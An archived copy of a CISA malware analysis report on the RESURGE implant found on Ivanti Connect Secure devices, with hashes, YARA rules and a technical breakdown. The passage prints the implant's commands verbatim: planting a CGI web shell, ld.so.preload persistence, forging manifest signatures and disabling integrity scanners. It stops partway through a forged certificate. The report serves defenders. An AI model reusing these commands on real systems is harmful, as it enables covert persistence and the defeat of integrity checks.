{
	"id": "4974d90d-1628-4328-9488-168c6120e73c",
	"created_at": "2026-04-29T02:20:40.456602Z",
	"updated_at": "2026-04-29T08:23:07.14625Z",
	"deleted_at": null,
	"sha1_hash": "e66bf4f24b2a40dc574ef2eb391547580205d627",
	"title": "MAR-25993211-r1.v2 Ivanti Connect Secure (RESURGE) | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 846965,
	"plain_text": "MAR-25993211-r1.v2 Ivanti Connect Secure (RESURGE) | CISA\r\nPublished: 2026-02-26 · Archived: 2026-04-29 02:04:31 UTC\r\nNote: This Malware Analysis Report (MAR) was originally published Mar. 28, 2025, to share indicators of compromise\r\n(IOCs) and detection signatures for RESURGE Malware. The Cybersecurity and Infrastructure Security Agency (CISA)\r\nupdated this MAR on Feb. 26, 2026, to provide deeper technical insight into RESURGE to provide network defenders with\r\nenhanced understanding and tools to identify, mitigate, and respond to RESURGE. CISA’s updated analysis shows that\r\nRESURGE can remain latent on systems until a remote actor attempts to connect to the compromised device. Because of\r\nthis, CISA assesses that RESURGE may be dormant and undetected on Ivanti Connect Secure devices and remains an active\r\nthreat. CISA encourages organizations to use the IOCs and detection signatures to identify RESURGE samples and to\r\nimplement the actions in CISA Mitigation Instructions for CVE-2025-0282 and Alert CISA Releases Malware Analysis\r\nReport on RESURGE Malware Associated with Ivanti Connect Secure.\r\nCISA analyzed three files obtained from a critical infrastructure’s Ivanti Connect Secure device after threat actors exploited\r\nIvanti CVE-2025-0282 for initial access. One file—that CISA is calling RESURGE—has functionality similar to\r\nSPAWNCHIMERA in how it creates a Secure Shell (SSH) tunnel for command and control (C2). CISA’s original analysis\r\nrevealed how RESURGE contains a series of commands that can modify files, manipulate integrity checks, and create a web\r\nshell that is copied to the running Ivanti boot disk. CISA’s updated analysis shows that RESURGE has sophisticated\r\nnetwork-level evasion and authentication techniques, leveraging advanced cryptographic methods and forged TLS\r\ncertificates to facilitate covert communications:\r\nThe second file is a variant of SPAWNSLOTH, that was contained within the RESURGE sample. The file tampers with the\r\nIvanti device logs. The third file is a custom embedded binary that contains an open-source shell script and a subset of\r\napplets from the open-source tool BusyBox. The open-source shell script allows for ability to extract an uncompressed\r\nkernel image (vmlinux) from a compromised kernel image. BusyBox enables threat actors to perform various functions such\r\nas download and execute payloads on compromised devices.\r\nFor information on CVE-2025-0282, see CISA Alert CISA Releases Malware Analysis Report on RESURGE Malware\r\nAssociated with Ivanti Connect Secure.\r\nSubmitted Files (3)\r\n3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104 (liblogblock.so)\r\n52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda (libdsupgrade.so)\r\nb1221000f43734436ec8022caaa34b133f4581ca3ae8eccd8d57ea62573f301d (dsmain)\r\n52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda\r\nTags\r\nbackdoor dropper rootkit trojan\r\nDetails\r\nName libdsupgrade.so\r\nSize 1414480 bytes\r\nType ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.16, str\r\nMD5 cfb263a731d51ff489168bbca0d3bd2f\r\nSHA1 87bcbbcb878aeee6ad4463464745770e95c6a937\r\nSHA256 52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda\r\nSHA512 3d12fdb707c188eb2e94cbf2dd42a50cfe343128652bab9245a54b887e35bc32c6a88c8faa5001a045df3991b387fcd6a27719ecbf84f6ce89316\r\nssdeep 24576:h6j7Ed+iowSCstJtmOKSbqUmtzYxs7X0ToN8fp/AQClBka:h4wSC0JtmpntzYMU2\r\nEntropy 6.171523\r\nAntivirus\r\nClamAV Unix.Backdoor.SpawnMole-10044412-1\r\nESET a variant of Linux/SpawnSnail.A trojan\r\nhttps://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nPage 1 of 17\n\nYARA Rules\r\nrule CISA_10454006_13 : SALTWATER backdoor exploit_kit communicates_with_c2 determines_c2_server\r\nhides_executing_code exploitation\r\n{\r\nmeta:\r\nauthor = \"CISA Code \u0026 Media Analysis\"\r\nincident = \"10454006\"\r\ndate = \"2023-08-10\"\r\nlast_modified = \"20230905_1500\"\r\nactor = \"n/a\"\r\nfamily = \"SALTWATER\"\r\ncapabilities = \"communicates-with-c2 determines-c2-server hides-executing-code\"\r\nmalware_type = \"backdoor exploit-kit\"\r\ntool_type = \"exploitation\"\r\ndescription = \"Detects SALTWATER samples\"\r\nsha256 = \"caab341a35badbc65046bd02efa9ad2fe2671eb80ece0f2fa9cf70f5d7f4bedc\"\r\nstrings:\r\n$s1 = { 70 74 68 72 65 61 64 5f 63 72 65 61 74 65 }\r\n$s2 = { 67 65 74 68 6f 73 74 62 79 6e 61 6d 65 }\r\n$s3 = { 54 72 61 6d 70 6f 6c 69 6e 65 }\r\n$s4 = { 64 73 65 6c 64 73 }\r\n$s5 = { 25 30 38 78 20 28 25 30 32 64 29 20 25 2d 32 34 73 20 25 73 25 73 25 73 0a }\r\n$s6 = { 45 6e 74 65 72 20 6f 75 73 63 64 6f 6f 65 7c 70 72 65 64 61 72 65 28 25 70 2c 20 25 70 2c 20 25 70 29 }\r\n$s7 = { 45 6e 74 65 72 20 61 75 74 63 63 6f 6f 71 38 63 72 65 61 74 65 }\r\n$s8 = { 74 6e 6f 72 6f 74 65 63 74 6a 73 65 6d 6f 72 79 }\r\n$s9 = { 56 55 43 4f 4d 49 53 53 }\r\n$s10 = { 56 43 4f 4d 49 53 53 }\r\n$s11 = { 55 43 4f 4d 49 53 44 }\r\n$s12 = { 41 45 53 4b 45 59 47 45 4e 41 53 53 49 53 54 }\r\n$s13 = { 46 55 43 4f 4d 50 50 }\r\n$s14 = { 55 43 4f 4d 49 53 53 }\r\ncondition:\r\nuint16(0) == 0x457f and filesize \u003c 1800KB and 8 of them\r\n}\r\nrule CISA_25239228_04 : SPAWNSNAIL backdoor dropper trojan communicates_with_c2 infects_files\r\n{\r\nmeta:\r\n      author = \"CISA Code \u0026 Media Analysis\"\r\n      incident = \"25239228\"\r\n      date = \"2025-03-04\"\r\n      last_modified = \"20250304_1144\"\r\n      actor = \"n/a\"\r\n      family = \"SPAWN\"\r\n      capabilities = \"communicates-with-c2 infects-files\"\r\n      malware_type = \"backdoor dropper trojan\"\r\n      tool_type = \"unknown\"\r\n      description = \"Detects SPAWNSNAIL malware samples\"\r\n      sha256_1 = \"366635c00b8e6f749a4d948574a0f1e7b4c842ca443176de27af45debbc14f71\"\r\nstrings:\r\n      $s1 = { 64 73 6D 64 6D 00 }\r\n      $s2 = { 2F 74 6D 70 2F 2E 6C 69 62 6C 6F 67 62 6C 6F 63 6B 2E 73 6F 00 }\r\n      $s3 = { 66 75 6E 63 68 6F 6F 6B 5F }\r\n      $s4 = { 2F 70 72 6F 63 2F 25 64 2F 6D 61 70 73 00 }\r\n      $p1 = { 50 54 52 41 43 45 5F 41 54 54 41 43 48 00 }\r\n      $p2 = { 50 54 52 41 43 45 5F 50 4F 4B 45 54 45 58 54 00 }\r\n      $p3 = { 50 54 52 41 43 45 5F 50 45 45 4B 54 45 58 54 00 }\r\n      $pk = { 2D 42 45 47 49 4E 20 4F 50 45 4E 53 53 48 20 50 52 49 56 41 54 45 20 4B 45 59 2D }\r\n      $ssh1 = { 73 73 68 5F 62 69 6E 64 5F 6C 69 73 74 65 6E 00 }\r\n      $ssh2 = { 73 73 68 5F 68 61 6E 64 6C 65 5F 6B 65 79 5F 65 78 63 68 61 6E 67 65 00 }\r\n      $ssh3 = { 73 73 68 5F 61 64 64 5F 73 65 74 5F 63 68 61 6E 6E 65 6C 5F 63 61 6C 6C 62 61 63 6B 73 00 }\r\n      $ssh4 = { 73 73 68 5F 70 6B 69 5F 69 6D 70 6F 72 74 5F 70 72 69 76 6B 65 79 5F 62 61 73 65 36 34 00 }\r\n      $ssh5 = { 73 73 68 5F 63 68 61 6E 6E 65 6C 5F 72 65 71 75 65 73 74 5F 65 78 65 63 }\r\n  condition:\r\nhttps://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nPage 2 of 17\n\nuint32(0) == 0x464c457f and any of ($s*) and 2 of ($p*) and $pk and 2 of ($ssh*)\r\n}\r\nrule CISA_25993211_01 : RESURGE backdoor dropper rootkit bootkit\r\n{\r\nmeta:\r\n   author = \"CISA Code \u0026 Media Analysis\"\r\n   incident = \"25993211\"\r\n   date = \"2025-03-03\"\r\n   last_modified = \"20250303_1446\"\r\n   actor = \"n/a\"\r\n   family = \"SPAWN\"\r\n   capabilities = \"n/a\"\r\n   malware_type = \"backdoor dropper rootkit bootkit\"\r\n   tool_type = \"unknown\"\r\n   description = \"Detects RESURGE malware samples\"\r\n   sha256_1 = \"52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda\"\r\nstrings:\r\n   $s1 = \"snprintf\"\r\n   $s2 = \"CGI::param\"\r\n   $s3 = \"coreboot.img\"\r\n   $s4 = \"scanner.py\"\r\n   $s5 = { 6C 6F 67 73 }\r\n   $s6 = \"accept\"\r\n   $s7 = \"strncpy\"\r\n   $s8 = \"dsmdm\"\r\n   $s9 = \"funchook_create\"\r\n   $s10 = { 20 83 B8 ED }\r\ncondition:\r\n   all of them\r\n} \r\nSIGMA Rule\r\nNo associated rule.\r\nRelationships\r\n52bbc44eb4... Contains 3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104\r\nDescription\r\nA key takeaway is this implant lies latent on critical infrastructure. It does not attempt to persistently communicate with a\r\nremote Command and Control (C2) server. Rather it lies passively, until a remote actor attempts to connect to the device.\r\nThe implant provides a vast array of command and control capabilities over compromised critical devices. Below is a\r\nsummary of some of the key additional findings documented in this product, which differentiate it from the previously\r\nreleased RESURGE MAR.\r\n===Key Features and Tactics===\r\n1. Process-Specific Behavior\r\n1. Web Process Hooking: If running under the `web` process, RESURGE hooks the `accept` function to intercept\r\nTLS connections. This allows it to act as a proxy, filtering traffic based on properly CRC32-fingerprinted TLS\r\nhandshakes.\r\n2. DSMDM Secure Shell: If running under the `dsmdm` process, it deploys a statically linked `libssh` server,\r\nenabling remote command-line access via SSH. Both components communicate via a socket file at\r\n`/home/runtime/tmp/.logsrv`, creating a covert channel.\r\n2. CRC32 Fingerprint Authentication\r\n1. TLS HELLO Filtering**: RESURGE checks incoming TLS packets for the `ClientHello` message. It\r\ncomputes a CRC32 hash of the random bytes field in the handshake. If the hash matches a predefined value,\r\nthe connection is proxied to `.logsrv`. Otherwise, traffic is forwarded to the legitimate Ivanti server.\r\n2. TLS SERVER HELLO Spoofing**: The malware generates 28 random bytes, computes their CRC32 hash,\r\nbyte-swaps the result, and inserts it at the start of the `ServerHello` random bytes field. This allows attackers\r\nto verify the connection origin, ensuring only authorized operators interact with the implant.\r\n3. Stealth and Persistence\r\nhttps://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nPage 3 of 17\n\n1. Traffic Blending: By mimicking legitimate TLS/SSH traffic, RESURGE avoids triggering alarms. The\r\nCRC32-based filtering ensures only authorized operators interact with the implant.\r\n2. Forged Certificates: The use of a fake Ivanti certificate in `ServerHello` responses allows RESURGE to\r\nimpersonate the legitimate server, further evading detection.\r\n===Threat Impact and Implications===\r\n1.  Enterprise Risk**: Ivanti devices are critical in enterprise environments. Compromise could lead to data exfiltration,\r\nlateral movement, and unauthorized access to internal networks.\r\n1. Remote Control: The embedded `libssh` server provides attackers with full shell access, enabling arbitrary\r\ncommand execution and long-term persistence.\r\n2. Detection Challenges: The use of standard protocols (TLS/SSH) and modular code complicates detection, as\r\nmalicious activity blends with legitimate traffic.\r\nThe file 'libdsupgrade.so' is a malicious 32-bit Linux Shared Object file that was extracted from an Ivanti Connect Secure\r\ndevice version 22[.]7[.]4[.]30859. The file contains capabilities of a rootkit, dropper, backdoor, bootkit, proxy, and tunneler.\r\nThe file shares similar functionality to SPAWNCHIMERA malware however, this file contains a series of commands that, at\r\nthe time of this analysis, have not been reported on. CISA is calling this variant Resurge. The similarities to\r\nSPAWNCHIMERA are as follows. Resurge checks if the file is loaded by a program called 'web' or 'dsmdm' (Figure 1).\r\nIf RESURGE is loaded under a process named 'web', it hooks the process's accept function and inspect and parses incoming\r\nTLS packets looking for specially crafted TLS connection attempts from a remote attacker using a CRC32 TLS fingerprint\r\nhashing scheme. The process of differentiating malicious TLS connection attempts from valid TLS connection attempts to\r\nthe Ivanti 'web' process is detailed below.\r\nIf the 'dsmdm' program is called, it creates a thread for a secure shell via SSH to the system. It doesn't bind to a port but\r\nrather binds to a file called '/home/runtime/tmp/.logsrv' and listens for connections, giving the TA a secure socket shell to the\r\nsystem. In order for the TA to access the shell, they need to access the file. Another thread is also created to drop the file\r\n'liblogblock.so' to the '/tmp' directory. It creates a handle to the 'proc' folder, enumerating through it looking for the\r\n'dslogserver' process. It interacts with 'dslogserver' through shared memory to read from or write to the memory it is using. It\r\nchecks whether the dslogserver is up. If not, it sleeps for 10 seconds and then checks again. This behavior continues in a\r\nloop until the server is detected, at which time it will try to load a shared object file called '/tmp/.liblogblock.so'.\r\nResurge contains a series of commands that have not been seen before. They have been broken down and perform the\r\nfollowing functionality:\r\nCommands 1: Inserts itself into 'ld.so.preload', sets up a webshell for remote command execution within the\r\n'compcheckresult.cgi' file, fakes integrity checks, and generates keys against the modified files to sign the manifest file so\r\nthey appear legitimate.\r\nCommands 2: Decrypts, modifies, and re-encrypts coreboot Random Access Memory (RAM) disk.\r\nCommands 3: Uses system() to execute several sed commands. These commands modify the contents of two Python files\r\n('scanner.py' and 'scanner_legacy.py') by searching for particular lines and replacing them with new one which, if successful,\r\nwill result in the scanning scripts no longer keeping track of mismatches or new files.\r\n---Begin Commands 1--- \r\n/bin/sed -i '/echo_console \\\"Saving package\\\"/i\r\n-Searches for the string echo_console \"Saving package\" and enters the following commands before it:\r\ncp /lib/%s /tmp/data/root/lib\r\n-Copies itself to '/tmp/data/root/lib'.\r\ncp /home/venv3/lib/python3.6/site-packages/scanner-0.1-py3.6.egg /tmp/data/root/home/venv3/lib/python3.6/site-packages/scanner-0.1-py3.6.egg\r\n-Copies a Python package 'scanner-0.1-py3.6.egg' to /tmp/data/root/home/venv3/lib/....\r\necho \"/lib/%s \"`/home/bin/openssl dgst -sha256 /lib/%s|cut -d \" \"-f 2` b\\\" \u003e\u003e /tmp/data/root/home/etc/manifest/manifest\r\n-Calculates a SHA-256 hash for itself using openssl dgst. The result is appended to the 'manifest' file.\r\nsed -i \"1i/lib/%s\" /tmp/data/root/etc/ld.so.preload\r\n-This inserts itself to the beginning of the 'ld.so.preload' file.\r\ntouch /tmp/data/root/etc/ld.so.preload\r\n-Updates the timestamp of the 'ld.so.preload' file.\r\nsed -i \"/ENV{\\\"DSINSTALL_CLEAN\\\"} = $clean;/a \\\\$ENV{\\\"LD_PRELOAD\\\"} = \\\"%s\\\";\"\r\n/tmp/data/root/home/perl/DSUpgrade.pm\r\n-Adds a new line after the pattern ENV{\"DSINSTALL_CLEAN\"} = $clean; in the 'DSUpgrade.pm' file. Then sets the\r\nenvironment variable LD_PRELOAD to %s ensuring the library is preloaded when the script is run.\r\nhttps://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nPage 4 of 17\n\nsed -i \"/popen(*FH, \\$prog);/a \\\\$ENV{\\\"LD_PRELOAD\\\"} = \\\"\\\";\" /tmp/data/root/home/perl/DSUpgrade.pm\r\n-Searches for the string \"/popen(*FH, \\$prog);/\" in the 'DSUpgrade.pm' file and then adds the line\r\n$ENV{\"LD_PRELOAD\"} = \"\"; after popen(...);. It clears the 'LD_PRELOAD' environment variable of all preloaded\r\nlibraries after the 'DSUpgrade.pm' file executes.\r\nsed -i \"s/DSUpgrade.pm \\w{64}/DSUpgrade.pm `/home/bin/openssl dgst -sha256 /tmp/data/root/home/perl/DSUpgrade.pm |\r\ncut -d \\\" \\\" -f 2` \\\" /tmp/data/root/home/etc/manifest/manifest\r\n-Searches for the SHA-256 checksum for 'DSUpgrade.pm' in the 'manifest' file. It uses openssl dgst to calculate the hash of\r\nDSUpgrade.pm and replaces the old value with this hash.\r\nsed -i \"/main();/I if(CGI::param(\\\"vXm8DtMJG\\\")){\\n\\\\ print \\\"Cache-Control: no-cache\\\\n\\\"; \\n\\\\ print \\\"Content-type:\r\ntext/html\\\\n\\\\\\n\\\"; \\n\\\\ my \\$a=CGI::param(\\\"vXm8DtMJG\\\");\\n\\\\ system(\\\"$a\\\");\\n}\"\r\n/tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckresult.cgi\r\n-This inserts Perl code before the main(); function in the file 'compcheckresult.cgi'. It checks for the parameter\r\n\"vXm8DtMJG\" and, if it exists, runs a command provided by the attacker through the web server\r\nsed -i \"s/compcheckresult.cgi \\w{64}/compcheckresult.cgi `/home/bin/openssl dgst -sha256\r\n\"/tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckresult.cgi | cut -d \\\" \\\" -f 2` \\\"\r\n/tmp/data/root/home/etc/manifest/manifest\r\n-Similar to the earlier command, it replaces the old 'compcheckresult.cgi' with the new SHA-256 hash inside the 'manifest'\r\nfile.\r\nsed -i \"s/exit 1/exit 0/g\\\" /tmp/data/root/home/bin/check_integrity.sh\r\n-This command replaces all instances of exit 1 with exit 0 in 'check_integrity.sh'. This ensures that the script does not exit\r\nwith an error.\r\nsed -i \\\"s/check_integrity.sh \\w{64}/check_integrity.sh `/home/bin/openssl dgst -sha256\r\n/tmp/data/root/home/bin/check_integrity.sh | cut -d \\\" \\\" -f 2`/\\\" /tmp/data/root/home/etc/manifest/manifest\r\n-Similar to the earlier command, it replaces the old 'check_integrity.sh' with the new SHA-256 hash inside the 'manifest' file.\r\n/home/bin/openssl genrsa -out private.pem 2048\r\n-This generates a 2048-bit RSA private key and saves it in 'private.pem'.\r\n/home/bin/openssl rsa -in private.pem -out manifest.2 -outform PEM -pubout\r\n-This command extracts the public key from the 'private.pem' file and saves it as 'manifest.2'.\r\n/home/bin/openssl dgst -sha512 -sign private.pem -out manifest.1 /tmp/data/root/home/etc/manifest/manifest\r\n-This signs the manifest file using the private key generating a SHA-512 signature and saving it as 'manifest.1'.\r\nmv manifest.1 manifest.2 /tmp/data/root/home/etc/manifest/\r\n-Moves the signed manifest files (manifest.1 and manifest.2) into the '/tmp/data/root/home/etc/manifest/' directory\r\nrm -f private.pem' ./do-install\";\r\n-Deletes the private key file and finally executes the script 'do-install'.\r\n---End Commands 1---\r\n------------------------------------------------------------------------------------------\r\n---Begin Commands 2---\r\nsed -i '/\\\\/bin\\\\/cp \\\\/tmp\\\\/data\\\\/root\\\\/\\\\${kerndir}\\\\/coreboot.img \\\\/tmp\\\\/data\\\\/boot\\\\//i\\\\\\n\"\r\nModifies `/tmp/installer/do-install-coreboot by adding the following commands before the line \"/bin/cp\r\n/tmp/data/root/${kerndir}/coreboot.img /tmp/data/boot/\"\r\n/bin/mkdir /tmp/new_img\r\nCreate a new directory '/tmp/new_img'.\r\n/bin/dsmain -g\r\nExecute dsmain with the -g argument\r\n/bin/sh /tmp/extract_vmlinux.sh /tmp/data/root/${kerndir}/bzImage \u003e /tmp/new_img/vmlinux\"\r\nExecutes a shell script 'extract_vmlinux.sh' against 'bzImage' and saves the output to '/tmp/new_img/vmlinux'.\r\n/bin/rm /tmp/extract_vmlinux.sh\r\nDeletes 'extract_vmlinux.sh'.\r\noutput=$(/bin/dsmain strings -t x /tmp/new_img/vmlinux | grep \\\"Linux version \\\")\r\nDeclares the variable $output. Searches for the string 'Linux Version' inside the 'vmlinux' file while preserving its hex offsets\r\nand saves the memory address of the string to $output.\r\nhttps://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nPage 5 of 17\n\noffset=\\\"0x\\\"$(echo $output | awk '\\\"'\\\"'{print $1}'\\\"'\\\"')\r\nDeclares the $offset variable. Extracts the hex offset from $output and prefixes it with 0x.\r\noffset=$((offset + 0xc0))\r\nAdds 0xc0 hex (192 decimal) to the offset current value and saves it in $offset.\r\nkey=$(/bin/dsmain xxd -s \\\"$offset\\\" -l 16 -p /tmp/new_img/vmlinux)\r\nDeclares the $key variable. It reads 16 bytes from $offset using 'xxd'. These 16 bytes are then stored as hex in the $key.\r\n/bin/dsmain -d /tmp/data/root/${kerndir}/coreboot.img /tmp/new_img/coreboot.img.1.gz $key\r\nExecutes dsmain with the -d argument to decrypt 'coreboot.img' using the extracted $key and stores the output as\r\n'coreboot.img.1.gz'\r\n/bin/mkdir /tmp/coreboot_fs\r\nMakes a new directory '/tmp/coreboot_fs'.\r\n/bin/dsmain gunzip /tmp/new_img/coreboot.img.1.gz -c \u003e /tmp/coreboot_fs/coreboot.img.1\r\nExecutes dsmain to decompress 'coreboot.img.1.gz' into 'coreboot.img.1' within the new directory.\r\ncd /tmp/coreboot_fs\r\nChanges into the '/tmp/coreboot_fs' directory.\r\n/bin/dsmain cpio -idvm \u003c coreboot.img.1\r\nExecutes dsmain with cpio -idvm to extract the compressed 'coreboot.img.1'.\r\n/bin/rm coreboot.img.1\r\nDeletes 'coreboot.img.1'.\r\ncp /bin/dsmain /tmp/coreboot_fs/bin/dsmain\r\nCopies dsmain into the 'coreboot_fs' directory.\r\ncp /lib/%s /tmp/coreboot_fs/lib/%s\r\nCopies itself into the 'coreboot_fs' directory.\r\ncp /home/venv3/lib/python3.6/site-packages/scanner-0.1-py3.6.egg /tmp/coreboot_fs/bin/scanner-0.1-py3.6.egg\r\nCopies the python package 'scanner-0.1-py3.6.egg' into the 'coreboot_fs' directory.\r\n/bin/sed -i rollback_on_error $? \"Extracting Package\"\r\nModifies the boot process by adding the below commands to the file '/tmp/coreboot_fs/bin/init' below the line\r\n'rollback_on_error $? \"Extracting Package\".\r\n/bin/dsmain touch /etc/ld.so.preload\r\nExecute dsmain with touch '/etc/ld.so.preload' to update the access and modified time to the current time.\r\n/bin/dsmain sed -I \"1i/lib/%s\" /home/root/etc/ld.so.preload\r\nAdds itself to the top of 'ld.so.preload'.\r\n/bin/cp /bin/dsmain /home/root/bin/dsmain\r\nCopy dsmain into the 'root/bin' directory.\r\n/bin/cp /bin/scanner-0.1-py3.6.egg /home/root/home/venv3/lib/python3.6/site-packages/scanner-0.1-py3.6.egg\r\nCopy 'scanner-0.1-py3.6.egg' into a 'root' directory.\r\n/bin/cp /lib/%s /home/root/lib/%s\r\nCopy itself into the 'root/lib' directory.\r\n\"\\\" /tmp/coreboot_fs/bin/init\r\nThe boot process files being modified with the above commands.\r\n/bin/dsmain find . -print | /bin/dsmain cpio -o -H newc \u003e /tmp/coreboot_fs/coreboot.img.1\r\nExecute dsmain to repackage the modified 'coreboot.img'.\r\n/bin/dsmain gzip /tmp/coreboot_fs/coreboot.img.1\r\nExecute dsmain to compress the modified 'coreboot.img'.\r\n/bin/dsmain -e /tmp/coreboot_fs/coreboot.img.1.gz /tmp/data/root/${kerndir}/coreboot.img $key\r\nExecute dsmain to encrypt the modified 'coreboot.img'.\r\nrm -rf /tmp/coreboot_fs'\r\nDelete the '/tmp/coreboot_fs' directory.\r\nhttps://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nPage 6 of 17\n\n/tmp/installer/do-install-coreboot\r\nThe file being modified with the commands.\r\n---End Commands 2---\r\n------------------------------------------------------------------------------------------ \r\n---Begin Commands 3---\r\nsystem(\"sed -i 's/mismatchCount += 1/pass/g' scripts/scanner.py\");\r\nReplace the 'mismatchCount += 1' with 'pass' in 'scanner.py'.\r\nsystem(\"sed -i 's/mismatchedFiles.append(file)/ /g' scripts/scanner.py\");\r\nReplace the 'mismatchedFiles.append(file)' with a blank space in 'scanner.py'.\r\nsystem(\"sed -i 's/newFilesCount += 1/pass/g' scripts/scanner.py\");\r\nReplace 'newFilesCount += 1' with 'pass' in 'scanner.py'.\r\nsystem(\"sed -i 's/newFilesDetected.append(file)/ /g' scripts/scanner.py\");\r\nReplace 'newFilesDetected.append(file)' with a blank space in 'scanner.py'.\r\nsystem(\"sed -i 's/mismatchCount += 1/pass/g' scripts/scanner_legacy.py\");\r\nReplace the 'mismatchCount += 1' with 'pass' in 'scanner_legacy.py'.\r\nsystem(\"sed -i 's/mismatchedFiles.append(file)/ /g' scripts/scanner_legacy.py\");\r\nReplace the 'mismatchedFiles.append(file)' with a blank space in 'scanner_legacy.py'.\r\nsystem(\"sed -i 's/newFilesCount += 1/pass/g' scripts/scanner_legacy.py\");\r\nReplace 'newFilesCount += 1' with 'pass' in 'scanner_legacy.py'.\r\nsystem(\"sed -i 's/newFilesDetected.append(file)/ /g' scripts/scanner_legacy.py\");\r\nReplace 'newFilesDetected.append(file)' with a blank space in 'scanner_legacy.py'.\r\n---End Commands 3---\r\nThe RESURGE implant follows a passive remote Command and Control (C2) methodology. It sits on the compromised\r\nIvanti device indefinitely, waiting for a connection from a remote hacker. The Implant hooks directly into the native Ivanti\r\nweb server, a running process named \"web\", via process injection. The implant then captures and inspects all incoming TLS\r\nHELLO packets to determine which ones are valid TLS connection attempts to the native Ivanti web server, and which ones\r\nare malicious TLS connections from the remote hacker to gain access to the Command and Control capabilities provided by\r\nthe RESURGE implant.\r\nThis methodology allows the remote operator to gain full C2 access on compromised Ivanti devices at will. The implant\r\ndetermines which TLS connections are destined for itself and the remote access capabilities it provides by verifying the\r\nincoming TLS hello packet with a CRC fingerprint hashing scheme (Figure 2). All TLS connection attempts not verified as\r\nmalicious connection attempts via this TLS fingerprint hashing scheme are released directly to the legitimate Ivanti web\r\nserver for normal processing.\r\nIllustrated within Figure 3 is a call to the embedded CRC32 hash function. It is used to hash the last 28 bytes of the\r\nincoming TLS random byte value within the TLS hello packet sent from a remote operator. After this 28 bytes is CRC32\r\nhashed, it is then modified via the operation ((v2 \u003c\u003c 8) \u0026 0xFF0000 | (v2 \u003c\u003c 24) | (v2 \u003e\u003e 8) \u0026 0xFF00 | HIBYTE(v2))\r\n(BSWAP instruction), and the resulting 4 bytes is directly compared to the first 4 bytes of the TLS random byte value within\r\nthe same incoming TLS HELLO packet. If the results match, RESURGE will proceed to the next stage of the authentication\r\nprocess, potentially allowing the operator full remote SSH access to the compromised device.\r\nThe next stage of the authentication process with RESURGE involves the implant generating its own TLS SERVER HELLO\r\npacket to respond to the TLS HELLO packet sent from the remote operator. As illustrated in Figure 4, most of this packet is\r\nformed from randomly generated data. The TLS HELLO random bytes value is formed by first generating 28 random bytes.\r\nThe prepended four bytes of this value will be created by CRC32 hashing these random 28 bytes and byte swapping the\r\nresultant 4 bytes utilizing the _byteswap_ulong() function. This TLS SERVER HELLO response packet is appropriate to\r\npass the TLS fingerprint authentication hashing scheme on the remote operators side. The following public TLS certificate\r\nwill be attached to this newly formed TLS SERVER HELLO response from the compromised Ivanti device:\r\n--Begin Fake Ivanti TLS Certificate--\r\nCertificate:\r\n   Data:\r\n       Version: 3 (0x2)\r\n       Serial Number:\r\n           59[:]d3[:]b0[:]74[:]ac[:]64[:]33[:]01\r\n       Signature Algorithm: sha256WithRSAEncryption\r\n       Issuer: C = ??, ST = ??, L = ??, O = Ivanti Org, OU = ??, CN = va1[.]Ivanti[.]net, emailAddress = ??\r\nhttps://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nPage 7 of 17\n\nValidity\r\n           Not Before: Jul 15 19[:]35[:]59 2024 GMT\r\n           Not After : Jan 5 19[:]35[:]59 2030 GMT\r\n       Subject: C = ??, ST = ??, L = ??, O = Ivanti Org, OU = ??, CN = va1[.]Ivanti[.]net, emailAddress = ??\r\n       Subject Public Key Info:\r\n           Public Key Algorithm: rsaEncryption\r\n               RSA Public-Key: (2048 bit)\r\n               Modulus:\r\n                   00[:]ee[:]8e[:]ea[:]6c[:]42[:]20[:]e0:9f[:]6b[:]fe[:]7c[:]19[:]48[:]f5:\r\n                   ea[:]51[:]6c[:]4d[:]79[:]f5[:]9f[:]94:ec[:]b7[:]07[:]f0[:]ef[:]e1[:]ed:\r\n                   b4[:]1d[:]cd[:]6a[:]21[:]40[:]67[:]8e:d2[:]ac[:]ab[:]62[:]69[:]b4[:]0e:\r\n                   77[:]37[:]8c[:]04[:]b0[:]fe[:]92[:]b7:48[:]bd[:]62[:]5a[:]8f[:]f8[:]48:\r\n                   54[:]5c[:]e4[:]26[:]39[:]76[:]1b[:]ee:71[:]9a[:]f4[:]09[:]3a[:]d0[:]e8:\r\n                   8f[:]08[:]d4[:]5d[:]75[:]8c[:]2a[:]70:44[:]e1[:]55[:]30[:]48[:]0e[:]1e:\r\n                   85[:]c5[:]a4[:]0e[:]b6[:]f7[:]e8[:]76:43[:]4f[:]a3[:]41[:]b5[:]7b[:]a2:\r\n                   23[:]be[:]e5[:]d2[:]4a[:]56[:]0d[:]11:89[:]2d[:]d5[:]2f[:]36[:]ad[:]13:\r\n                   0d[:]11[:]40[:]2f[:]9b[:]25[:]b1[:]53:3f[:]cb[:]ed[:]2b[:]2f[:]5e[:]2a:\r\n                   a4[:]2b[:]9c[:]00[:]53[:]95[:]35[:]2a:99[:]c8[:]d4[:]9f[:]7a[:]ec[:]2c:\r\n                   61[:]93[:]e9[:]06[:]10[:]a2[:]d7[:]19:5e[:]62[:]63[:]60[:]79[:]e8[:]3e:\r\n                   e3[:]cc[:]b8[:]f4[:]42[:]b0[:]35[:]83:7e[:]14[:]4c[:]fa[:]3a[:]b9[:]55:\r\n                   15[:]a2[:]19[:]4d[:]79[:]6b[:]a6[:]b4:27[:]95[:]f1[:]a0[:]c1[:]ce[:]08:\r\n                   